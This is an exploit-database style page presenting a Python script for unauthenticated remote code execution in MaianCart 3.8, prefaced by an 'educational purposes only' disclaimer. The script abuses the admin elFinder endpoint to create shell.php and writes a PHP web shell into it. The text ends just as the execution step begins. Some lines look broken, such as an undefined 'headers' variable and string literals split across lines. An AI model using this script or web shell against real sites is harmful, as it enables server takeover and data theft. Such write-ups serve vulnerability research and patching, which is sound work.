Exploits / Vulnerability Discovered : 2021-10-08 |
Type : webapps |
Platform : php
This exploit / vulnerability Maiancart 3.8 remote code execution (rce) (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()
#args
host = sys.argv[1]
directory = sys.argv[2]
#CREATE THE FILE
print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)
try:
r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
print(r.text)
if "added" in r.text:
print("\033[95mFile successfully created.\n\033[00m")
else:
print("\033[91mSome error occured.\033[00m")
except (requests.exceptions.RequestException):
print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")
#GET THE FILE ID
time.sleep(1)
file_response = r.text
soup = BeautifulSoup(file_response,'html.parser')
site_json=json.loads(soup.text)
hash_id = [h.get('hash') for h in site_json['added']]
file_id = str(hash_id).replace("['", "").replace("']", "")
print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m")
print("\n")
#WRITE TO THE FILE
print("\033[95mWritting the payload to the file...\033[00m")
print("\n")
time.sleep(1)
data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"
try:
write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder",
headers=headers, data=data)
print(write.text)
except (requests.exceptions.RequestException):
print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")
#EXECUTE THE PAYLOAD
print("\033[95mExecuting the payload...\033[00m")
print("\n")
time.sleep(1)